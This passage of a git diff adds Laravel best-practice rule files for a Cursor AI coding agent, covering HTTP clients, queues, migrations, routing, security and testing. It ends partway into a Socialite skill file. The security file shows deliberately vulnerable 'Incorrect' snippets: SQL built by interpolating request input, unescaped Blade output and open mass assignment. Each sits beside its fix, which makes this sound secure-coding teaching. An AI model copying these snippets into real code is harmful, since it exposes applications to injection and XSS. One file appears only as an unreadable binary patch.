+Laravel auto-detects `Accept: application/json` but API clients may not set it. Explicitly declare JSON rendering for API routes.
+
+```php
+$exceptions->shouldRenderJsonWhen(function (Request $request, Throwable $e) {
+    return $request->is('api/*') || $request->expectsJson();
+});
+```
+
+## Add Context to Exception Classes
+
+Attach structured data to exceptions at the source via a `context()` method — Laravel includes it automatically in the log entry.
+
+```php
+class InvalidOrderException extends Exception
+{
+    public function context(): array
+    {
+        return ['order_id' => $this->orderId];
+    }
+}
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/events-notifications.md b/.cursor/skills/laravel-best-practices/rules/events-notifications.md
new file mode 100644
index 000000000..bc43f1997
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/events-notifications.md
@@ -0,0 +1,48 @@
+# Events & Notifications Best Practices
+
+## Rely on Event Discovery
+
+Laravel auto-discovers listeners by reading `handle(EventType $event)` type-hints. No manual registration needed in `AppServiceProvider`.
+
+## Run `event:cache` in Production Deploy
+
+Event discovery scans the filesystem per-request in dev. Cache it in production: `php artisan optimize` or `php artisan event:cache`.
+
+## Use `ShouldDispatchAfterCommit` Inside Transactions
+
+Without it, a queued listener may process before the DB transaction commits, reading data that doesn't exist yet.
+
+```php
+class OrderShipped implements ShouldDispatchAfterCommit {}
+```
+
+## Always Queue Notifications
+
+Notifications often hit external APIs (email, SMS, Slack). Without `ShouldQueue`, they block the HTTP response.
+
+```php
+class InvoicePaid extends Notification implements ShouldQueue
+{
+    use Queueable;
+}
+```
+
+## Use `afterCommit()` on Notifications in Transactions
+
+Same race condition as events — the queued notification job may run before the transaction commits.
+
+## Route Notification Channels to Dedicated Queues
+
+Mail and database notifications have different priorities. Use `viaQueues()` to route them to separate queues.
+
+## Use On-Demand Notifications for Non-User Recipients
+
+Avoid creating dummy models to send notifications to arbitrary addresses.
+
+```php
+Notification::route('mail', 'admin@example.com')->notify(new SystemAlert());
+```
+
+## Implement `HasLocalePreference` on Notifiable Models
+
+Laravel automatically uses the user's preferred locale for all notifications and mailables — no per-call `locale()` needed.
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/http-client.md b/.cursor/skills/laravel-best-practices/rules/http-client.md
new file mode 100644
index 000000000..0a7876ed3
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/http-client.md
@@ -0,0 +1,160 @@
+# HTTP Client Best Practices
+
+## Always Set Explicit Timeouts
+
+The default timeout is 30 seconds — too long for most API calls. Always set explicit `timeout` and `connectTimeout` to fail fast.
+
+Incorrect:
+```php
+$response = Http::get('https://api.example.com/users');
+```
+
+Correct:
+```php
+$response = Http::timeout(5)
+    ->connectTimeout(3)
+    ->get('https://api.example.com/users');
+```
+
+For service-specific clients, define timeouts in a macro:
+
+```php
+Http::macro('github', function () {
+    return Http::baseUrl('https://api.github.com')
+        ->timeout(10)
+        ->connectTimeout(3)
+        ->withToken(config('services.github.token'));
+});
+
+$response = Http::github()->get('/repos/laravel/framework');
+```
+
+## Use Retry with Backoff for External APIs
+
+External APIs have transient failures. Use `retry()` with increasing delays.
+
+Incorrect:
+```php
+$response = Http::post('https://api.stripe.com/v1/charges', $data);
+
+if ($response->failed()) {
+    throw new PaymentFailedException('Charge failed');
+}
+```
+
+Correct:
+```php
+$response = Http::retry([100, 500, 1000])
+    ->timeout(10)
+    ->post('https://api.stripe.com/v1/charges', $data);
+```
+
+Only retry on specific errors:
+
+```php
+$response = Http::retry(3, 100, function (Exception $exception, PendingRequest $request) {
+    return $exception instanceof ConnectionException
+        || ($exception instanceof RequestException && $exception->response->serverError());
+})->post('https://api.example.com/data');
+```
+
+## Handle Errors Explicitly
+
+The HTTP Client does not throw on 4xx/5xx by default. Always check status or use `throw()`.
+
+Incorrect:
+```php
+$response = Http::get('https://api.example.com/users/1');
+$user = $response->json(); // Could be an error body
+```
+
+Correct:
+```php
+$response = Http::timeout(5)
+    ->get('https://api.example.com/users/1')
+    ->throw();
+
+$user = $response->json();
+```
+
+For graceful degradation:
+
+```php
+$response = Http::get('https://api.example.com/users/1');
+
+if ($response->successful()) {
+    return $response->json();
+}
+
+if ($response->notFound()) {
+    return null;
+}
+
+$response->throw();
+```
+
+## Use Request Pooling for Concurrent Requests
+
+When making multiple independent API calls, use `Http::pool()` instead of sequential calls.
+
+Incorrect:
+```php
+$users = Http::get('https://api.example.com/users')->json();
+$posts = Http::get('https://api.example.com/posts')->json();
+$comments = Http::get('https://api.example.com/comments')->json();
+```
+
+Correct:
+```php
+use Illuminate\Http\Client\Pool;
+
+$responses = Http::pool(fn (Pool $pool) => [
+    $pool->as('users')->get('https://api.example.com/users'),
+    $pool->as('posts')->get('https://api.example.com/posts'),
+    $pool->as('comments')->get('https://api.example.com/comments'),
+]);
+
+$users = $responses['users']->json();
+$posts = $responses['posts']->json();
+```
+
+## Fake HTTP Calls in Tests
+
+Never make real HTTP requests in tests. Use `Http::fake()` and `preventStrayRequests()`.
+
+Incorrect:
+```php
+it('syncs user from API', function () {
+    $service = new UserSyncService;
+    $service->sync(1); // Hits the real API
+});
+```
+
+Correct:
+```php
+it('syncs user from API', function () {
+    Http::preventStrayRequests();
+
+    Http::fake([
+        'api.example.com/users/1' => Http::response([
+            'name' => 'John Doe',
+            'email' => 'john@example.com',
+        ]),
+    ]);
+
+    $service = new UserSyncService;
+    $service->sync(1);
+
+    Http::assertSent(function (Request $request) {
+        return $request->url() === 'https://api.example.com/users/1';
+    });
+});
+```
+
+Test failure scenarios too:
+
+```php
+Http::fake([
+    'api.example.com/*' => Http::failedConnection(),
+]);
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/mail.md b/.cursor/skills/laravel-best-practices/rules/mail.md
new file mode 100644
index 000000000..c7f67966e
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/mail.md
@@ -0,0 +1,27 @@
+# Mail Best Practices
+
+## Implement `ShouldQueue` on the Mailable Class
+
+Makes queueing the default regardless of how the mailable is dispatched. No need to remember `Mail::queue()` at every call site — `Mail::send()` also queues it.
+
+## Use `afterCommit()` on Mailables Inside Transactions
+
+A queued mailable dispatched inside a transaction may process before the commit. Use `$this->afterCommit()` in the constructor.
+
+## Use `assertQueued()` Not `assertSent()` for Queued Mailables
+
+`Mail::assertSent()` only catches synchronous mail. Queued mailables silently pass `assertSent`, giving false confidence.
+
+Incorrect: `Mail::assertSent(OrderShipped::class);` when mailable implements `ShouldQueue`.
+
+Correct: `Mail::assertQueued(OrderShipped::class);`
+
+## Use Markdown Mailables for Transactional Emails
+
+Markdown mailables auto-generate both HTML and plain-text versions, use responsive components, and allow global style customization. Generate with `--markdown` flag.
+
+## Separate Content Tests from Sending Tests
+
+Content tests: instantiate the mailable directly, call `assertSeeInHtml()`.
+Sending tests: use `Mail::fake()` and `assertSent()`/`assertQueued()`.
+Don't mix them — it conflates concerns and makes tests brittle.
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/migrations.md b/.cursor/skills/laravel-best-practices/rules/migrations.md
new file mode 100644
index 000000000..de25aa39c
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/migrations.md
@@ -0,0 +1,121 @@
+# Migration Best Practices
+
+## Generate Migrations with Artisan
+
+Always use `php artisan make:migration` for consistent naming and timestamps.
+
+Incorrect (manually created file):
+```php
+// database/migrations/posts_migration.php  ← wrong naming, no timestamp
+```
+
+Correct (Artisan-generated):
+```bash
+php artisan make:migration create_posts_table
+php artisan make:migration add_slug_to_posts_table
+```
+
+## Use `constrained()` for Foreign Keys
+
+Automatic naming and referential integrity.
+
+```php
+$table->foreignId('user_id')->constrained()->cascadeOnDelete();
+
+// Non-standard names
+$table->foreignId('author_id')->constrained('users');
+```
+
+## Never Modify Deployed Migrations
+
+Once a migration has run in production, treat it as immutable. Create a new migration to change the table.
+
+Incorrect (editing a deployed migration):
+```php
+// 2024_01_01_create_posts_table.php — already in production
+$table->string('slug')->unique(); // ← added after deployment
+```
+
+Correct (new migration to alter):
+```php
+// 2024_03_15_add_slug_to_posts_table.php
+Schema::table('posts', function (Blueprint $table) {
+    $table->string('slug')->unique()->after('title');
+});
+```
+
+## Add Indexes in the Migration
+
+Add indexes when creating the table, not as an afterthought. Columns used in `WHERE`, `ORDER BY`, and `JOIN` clauses need indexes.
+
+Incorrect:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->constrained();
+    $table->string('status');
+    $table->timestamps();
+});
+```
+
+Correct:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->constrained()->index();
+    $table->string('status')->index();
+    $table->timestamp('shipped_at')->nullable()->index();
+    $table->timestamps();
+});
+```
+
+## Mirror Defaults in Model `$attributes`
+
+When a column has a database default, mirror it in the model so new instances have correct values before saving.
+
+```php
+// Migration
+$table->string('status')->default('pending');
+
+// Model
+protected $attributes = [
+    'status' => 'pending',
+];
+```
+
+## Write Reversible `down()` Methods by Default
+
+Implement `down()` for schema changes that can be safely reversed so `migrate:rollback` works in CI and failed deployments.
+
+```php
+public function down(): void
+{
+    Schema::table('posts', function (Blueprint $table) {
+        $table->dropColumn('slug');
+    });
+}
+```
+
+For intentionally irreversible migrations (e.g., destructive data backfills), leave a clear comment and require a forward fix migration instead of pretending rollback is supported.
+
+## Keep Migrations Focused
+
+One concern per migration. Never mix DDL (schema changes) and DML (data manipulation).
+
+Incorrect (partial failure creates unrecoverable state):
+```php
+public function up(): void
+{
+    Schema::create('settings', function (Blueprint $table) { ... });
+    DB::table('settings')->insert(['key' => 'version', 'value' => '1.0']);
+}
+```
+
+Correct (separate migrations):
+```php
+// Migration 1: create_settings_table
+Schema::create('settings', function (Blueprint $table) { ... });
+
+// Migration 2: seed_default_settings
+DB::table('settings')->insert(['key' => 'version', 'value' => '1.0']);
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/queue-jobs.md b/.cursor/skills/laravel-best-practices/rules/queue-jobs.md
new file mode 100644
index 000000000..d4575aac0
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/queue-jobs.md
@@ -0,0 +1,146 @@
+# Queue & Job Best Practices
+
+## Set `retry_after` Greater Than `timeout`
+
+If `retry_after` is shorter than the job's `timeout`, the queue worker re-dispatches the job while it's still running, causing duplicate execution.
+
+Incorrect (`retry_after` ≤ `timeout`):
+```php
+class ProcessReport implements ShouldQueue
+{
+    public $timeout = 120;
+}
+
+// config/queue.php — retry_after: 90 ← job retried while still running!
+```
+
+Correct (`retry_after` > `timeout`):
+```php
+class ProcessReport implements ShouldQueue
+{
+    public $timeout = 120;
+}
+
+// config/queue.php — retry_after: 180 ← safely longer than any job timeout
+```
+
+## Use Exponential Backoff
+
+Use progressively longer delays between retries to avoid hammering failing services.
+
+Incorrect (fixed retry interval):
+```php
+class SyncWithStripe implements ShouldQueue
+{
+    public $tries = 3;
+    // Default: retries immediately, overwhelming the API
+}
+```
+
+Correct (exponential backoff):
+```php
+class SyncWithStripe implements ShouldQueue
+{
+    public $tries = 3;
+    public $backoff = [1, 5, 10];
+}
+```
+
+## Implement `ShouldBeUnique`
+
+Prevent duplicate job processing.
+
+```php
+class GenerateInvoice implements ShouldQueue, ShouldBeUnique
+{
+    public function uniqueId(): string
+    {
+        return $this->order->id;
+    }
+
+    public $uniqueFor = 3600;
+}
+```
+
+## Always Implement `failed()`
+
+Handle errors explicitly — don't rely on silent failure.
+
+```php
+public function failed(?Throwable $exception): void
+{
+    $this->podcast->update(['status' => 'failed']);
+    Log::error('Processing failed', ['id' => $this->podcast->id, 'error' => $exception->getMessage()]);
+}
+```
+
+## Rate Limit External API Calls in Jobs
+
+Use `RateLimited` middleware to throttle jobs calling third-party APIs.
+
+```php
+public function middleware(): array
+{
+    return [new RateLimited('external-api')];
+}
+```
+
+## Batch Related Jobs
+
+Use `Bus::batch()` when jobs should succeed or fail together.
+
+```php
+Bus::batch([
+    new ImportCsvChunk($chunk1),
+    new ImportCsvChunk($chunk2),
+])
+->then(fn (Batch $batch) => Notification::send($user, new ImportComplete))
+->catch(fn (Batch $batch, Throwable $e) => Log::error('Batch failed'))
+->dispatch();
+```
+
+## `retryUntil()` Needs `$tries = 0`
+
+When using time-based retry limits, set `$tries = 0` to avoid premature failure.
+
+```php
+public $tries = 0;
+
+public function retryUntil(): DateTime
+{
+    return now()->addHours(4);
+}
+```
+
+## Use `WithoutOverlapping::untilProcessing()`
+
+Prevents concurrent execution while allowing new instances to queue.
+
+```php
+public function middleware(): array
+{
+    return [new WithoutOverlapping($this->product->id)->untilProcessing()];
+}
+```
+
+Without `untilProcessing()`, the lock extends through queue wait time. With it, the lock releases when processing starts.
+
+## Use Horizon for Complex Queue Scenarios
+
+Use Laravel Horizon when you need monitoring, auto-scaling, failure tracking, or multiple queues with different priorities.
+
+```php
+// config/horizon.php
+'environments' => [
+    'production' => [
+        'supervisor-1' => [
+            'connection' => 'redis',
+            'queue' => ['high', 'default', 'low'],
+            'balance' => 'auto',
+            'minProcesses' => 1,
+            'maxProcesses' => 10,
+            'tries' => 3,
+        ],
+    ],
+],
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/routing.md b/.cursor/skills/laravel-best-practices/rules/routing.md
new file mode 100644
index 000000000..e288375d7
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/routing.md
@@ -0,0 +1,98 @@
+# Routing & Controllers Best Practices
+
+## Use Implicit Route Model Binding
+
+Let Laravel resolve models automatically from route parameters.
+
+Incorrect:
+```php
+public function show(int $id)
+{
+    $post = Post::findOrFail($id);
+}
+```
+
+Correct:
+```php
+public function show(Post $post)
+{
+    return view('posts.show', ['post' => $post]);
+}
+```
+
+## Use Scoped Bindings for Nested Resources
+
+Enforce parent-child relationships automatically.
+
+```php
+Route::get('/users/{user}/posts/{post}', function (User $user, Post $post) {
+    // $post is automatically scoped to $user
+})->scopeBindings();
+```
+
+## Use Resource Controllers
+
+Use `Route::resource()` or `apiResource()` for RESTful endpoints.
+
+```php
+Route::resource('posts', PostController::class);
+Route::apiResource('api/posts', Api\PostController::class);
+```
+
+## Keep Controllers Thin
+
+Aim for under 10 lines per method. Extract business logic to action or service classes.
+
+Incorrect:
+```php
+public function store(Request $request)
+{
+    $validated = $request->validate([...]);
+    if ($request->hasFile('image')) {
+        $request->file('image')->move(public_path('images'));
+    }
+    $post = Post::create($validated);
+    $post->tags()->sync($validated['tags']);
+    event(new PostCreated($post));
+    return redirect()->route('posts.show', $post);
+}
+```
+
+Correct:
+```php
+public function store(StorePostRequest $request, CreatePostAction $create)
+{
+    $post = $create->execute($request->validated());
+
+    return redirect()->route('posts.show', $post);
+}
+```
+
+## Type-Hint Form Requests
+
+Type-hinting Form Requests triggers automatic validation and authorization before the method executes.
+
+Incorrect:
+```php
+public function store(Request $request): RedirectResponse
+{
+    $validated = $request->validate([
+        'title' => ['required', 'max:255'],
+        'body' => ['required'],
+    ]);
+
+    Post::create($validated);
+
+    return redirect()->route('posts.index');
+}
+```
+
+Correct:
+```php
+public function store(StorePostRequest $request): RedirectResponse
+{
+    Post::create($request->validated());
+
+    return redirect()->route('posts.index');
+}
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/scheduling.md b/.cursor/skills/laravel-best-practices/rules/scheduling.md
new file mode 100644
index 000000000..dfaefa26f
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/scheduling.md
@@ -0,0 +1,39 @@
+# Task Scheduling Best Practices
+
+## Use `withoutOverlapping()` on Variable-Duration Tasks
+
+Without it, a long-running task spawns a second instance on the next tick, causing double-processing or resource exhaustion.
+
+## Use `onOneServer()` on Multi-Server Deployments
+
+Without it, every server runs the same task simultaneously. Requires a shared cache driver (Redis, database, Memcached).
+
+## Use `runInBackground()` for Concurrent Long Tasks
+
+By default, tasks at the same tick run sequentially. A slow first task delays all subsequent ones. `runInBackground()` runs them as separate processes.
+
+## Use `environments()` to Restrict Tasks
+
+Prevent accidental execution of production-only tasks (billing, reporting) on staging.
+
+```php
+Schedule::command('billing:charge')->monthly()->environments(['production']);
+```
+
+## Use `takeUntilTimeout()` for Time-Bounded Processing
+
+A task running every 15 minutes that processes an unbounded cursor can overlap with the next run. Bound execution time.
+
+## Use Schedule Groups for Shared Configuration
+
+Avoid repeating `->onOneServer()->timezone('America/New_York')` across many tasks.
+
+```php
+Schedule::daily()
+    ->onOneServer()
+    ->timezone('America/New_York')
+    ->group(function () {
+        Schedule::command('emails:send --force');
+        Schedule::command('emails:prune');
+    });
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/security.md b/.cursor/skills/laravel-best-practices/rules/security.md
new file mode 100644
index 000000000..524d47e61
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/security.md
@@ -0,0 +1,198 @@
+# Security Best Practices
+
+## Mass Assignment Protection
+
+Every model must define `$fillable` (whitelist) or `$guarded` (blacklist).
+
+Incorrect:
+```php
+class User extends Model
+{
+    protected $guarded = []; // All fields are mass assignable
+}
+```
+
+Correct:
+```php
+class User extends Model
+{
+    protected $fillable = [
+        'name',
+        'email',
+        'password',
+    ];
+}
+```
+
+Never use `$guarded = []` on models that accept user input.
+
+## Authorize Every Action
+
+Use policies or gates in controllers. Never skip authorization.
+
+Incorrect:
+```php
+public function update(Request $request, Post $post)
+{
+    $post->update($request->validated());
+}
+```
+
+Correct:
+```php
+public function update(UpdatePostRequest $request, Post $post)
+{
+    Gate::authorize('update', $post);
+
+    $post->update($request->validated());
+}
+```
+
+Or via Form Request:
+
+```php
+public function authorize(): bool
+{
+    return $this->user()->can('update', $this->route('post'));
+}
+```
+
+## Prevent SQL Injection
+
+Always use parameter binding. Never interpolate user input into queries.
+
+Incorrect:
+```php
+DB::select("SELECT * FROM users WHERE name = '{$request->name}'");
+```
+
+Correct:
+```php
+User::where('name', $request->name)->get();
+
+// Raw expressions with bindings
+User::whereRaw('LOWER(name) = ?', [strtolower($request->name)])->get();
+```
+
+## Escape Output to Prevent XSS
+
+Use `{{ }}` for HTML escaping. Only use `{!! !!}` for trusted, pre-sanitized content.
+
+Incorrect:
+```blade
+{!! $user->bio !!}
+```
+
+Correct:
+```blade
+{{ $user->bio }}
+```
+
+## CSRF Protection
+
+Include `@csrf` in all POST/PUT/DELETE Blade forms. Not needed in Inertia.
+
+Incorrect:
+```blade
+<form method="POST" action="/posts">
+    <input type="text" name="title">
+</form>
+```
+
+Correct:
+```blade
+<form method="POST" action="/posts">
+    @csrf
+    <input type="text" name="title">
+</form>
+```
+
+## Rate Limit Auth and API Routes
+
+Apply `throttle` middleware to authentication and API routes.
+
+```php
+RateLimiter::for('login', function (Request $request) {
+    return Limit::perMinute(5)->by($request->ip());
+});
+
+Route::post('/login', LoginController::class)->middleware('throttle:login');
+```
+
+## Validate File Uploads
+
+Validate MIME type, extension, and size. Never trust client-provided filenames.
+
+```php
+public function rules(): array
+{
+    return [
+        'avatar' => ['required', 'image', 'mimes:jpg,jpeg,png,webp', 'max:2048'],
+    ];
+}
+```
+
+Store with generated filenames:
+
+```php
+$path = $request->file('avatar')->store('avatars', 'public');
+```
+
+## Keep Secrets Out of Code
+
+Never commit `.env`. Access secrets via `config()` only.
+
+Incorrect:
+```php
+$key = env('API_KEY');
+```
+
+Correct:
+```php
+// config/services.php
+'api_key' => env('API_KEY'),
+
+// In application code
+$key = config('services.api_key');
+```
+
+## Audit Dependencies
+
+Run `composer audit` periodically to check for known vulnerabilities in dependencies. Automate this in CI to catch issues before deployment.
+
+```bash
+composer audit
+```
+
+## Encrypt Sensitive Database Fields
+
+Use `encrypted` cast for API keys/tokens and mark the attribute as `hidden`.
+
+Incorrect:
+```php
+class Integration extends Model
+{
+    protected function casts(): array
+    {
+        return [
+            'api_key' => 'string',
+        ];
+    }
+}
+```
+
+Correct:
+```php
+class Integration extends Model
+{
+    protected $hidden = ['api_key', 'api_secret'];
+
+    protected function casts(): array
+    {
+        return [
+            'api_key' => 'encrypted',
+            'api_secret' => 'encrypted',
+        ];
+    }
+}
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/style.md b/.cursor/skills/laravel-best-practices/rules/style.md
new file mode 100644
index 0000000000000000000000000000000000000000..db689bf774d1763ac3ec520a3874015f5421ff5b
GIT binary patch
literal 4443
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
F{|%Ge#T5Vm

literal 0
HcmV?d00001

diff --git a/.cursor/skills/laravel-best-practices/rules/testing.md b/.cursor/skills/laravel-best-practices/rules/testing.md
new file mode 100644
index 000000000..d39cc3ed0
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/testing.md
@@ -0,0 +1,43 @@
+# Testing Best Practices
+
+## Use `LazilyRefreshDatabase` Over `RefreshDatabase`
+
+`RefreshDatabase` runs all migrations every test run even when the schema hasn't changed. `LazilyRefreshDatabase` only migrates when needed, significantly speeding up large suites.
+
+## Use Model Assertions Over Raw Database Assertions
+
+Incorrect: `$this->assertDatabaseHas('users', ['id' => $user->id]);`
+
+Correct: `$this->assertModelExists($user);`
+
+More expressive, type-safe, and fails with clearer messages.
+
+## Use Factory States and Sequences
+
+Named states make tests self-documenting. Sequences eliminate repetitive setup.
+
+Incorrect: `User::factory()->create(['email_verified_at' => null]);`
+
+Correct: `User::factory()->unverified()->create();`
+
+## Use `Exceptions::fake()` to Assert Exception Reporting
+
+Instead of `withoutExceptionHandling()`, use `Exceptions::fake()` to assert the correct exception was reported while the request completes normally.
+
+## Call `Event::fake()` After Factory Setup
+
+Model factories rely on model events (e.g., `creating` to generate UUIDs). Calling `Event::fake()` before factory calls silences those events, producing broken models.
+
+Incorrect: `Event::fake(); $user = User::factory()->create();`
+
+Correct: `$user = User::factory()->create(); Event::fake();`
+
+## Use `recycle()` to Share Relationship Instances Across Factories
+
+Without `recycle()`, nested factories create separate instances of the same conceptual entity.
+
+```php
+Ticket::factory()
+    ->recycle(Airline::factory()->create())
+    ->create();
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/validation.md b/.cursor/skills/laravel-best-practices/rules/validation.md
new file mode 100644
index 000000000..a20202ff1
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/validation.md
@@ -0,0 +1,75 @@
+# Validation & Forms Best Practices
+
+## Use Form Request Classes
+
+Extract validation from controllers into dedicated Form Request classes.
+
+Incorrect:
+```php
+public function store(Request $request)
+{
+    $request->validate([
+        'title' => 'required|max:255',
+        'body' => 'required',
+    ]);
+}
+```
+
+Correct:
+```php
+public function store(StorePostRequest $request)
+{
+    Post::create($request->validated());
+}
+```
+
+## Array vs. String Notation for Rules
+
+Array syntax is more readable and composes cleanly with `Rule::` objects. Prefer it in new code, but check existing Form Requests first and match whatever notation the project already uses.
+
+```php
+// Preferred for new code
+'email' => ['required', 'email', Rule::unique('users')],
+
+// Follow existing convention if the project uses string notation
+'email' => 'required|email|unique:users',
+```
+
+## Always Use `validated()`
+
+Get only validated data. Never use `$request->all()` for mass operations.
+
+Incorrect:
+```php
+Post::create($request->all());
+```
+
+Correct:
+```php
+Post::create($request->validated());
+```
+
+## Use `Rule::when()` for Conditional Validation
+
+```php
+'company_name' => [
+    Rule::when($this->account_type === 'business', ['required', 'string', 'max:255']),
+],
+```
+
+## Use the `after()` Method for Custom Validation
+
+Use `after()` instead of `withValidator()` for custom validation logic that depends on multiple fields.
+
+```php
+public function after(): array
+{
+    return [
+        function (Validator $validator) {
+            if ($this->quantity > Product::find($this->product_id)?->stock) {
+                $validator->errors()->add('quantity', 'Not enough stock.');
+            }
+        },
+    ];
+}
+```
\ No newline at end of file
diff --git a/.cursor/skills/socialite-development/SKILL.md b/.cursor/skills/socialite-development/SKILL.md
new file mode 100644
index 000000000..e660da691
--- /dev/null
+++ b/.cursor/skills/socialite-development/SKILL.md
@@ -0,0 +1,80 @@
+---
+name: socialite-development
+description: "Manages OAuth social authentication with Laravel Socialite. Activate when adding social login providers; configuring OAuth redirect/callback flows; retrieving authenticated user details; customizing scopes or parameters; setting up community providers; testing with Socialite fakes; or when the user mentions social login, OAuth, Socialite, or third-party authentication."
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Socialite Authentication
+
+## Documentation
+
+Use `search-docs` for detailed Socialite patterns and documentation (installation, configuration, routing, callbacks, testing, scopes, stateless auth).
+
+## Available Providers
+
+Built-in: `facebook`, `twitter`, `twitter-oauth-2`, `linkedin`, `linkedin-openid`, `google`, `github`, `gitlab`, `bitbucket`, `slack`, `slack-openid`, `twitch`
+
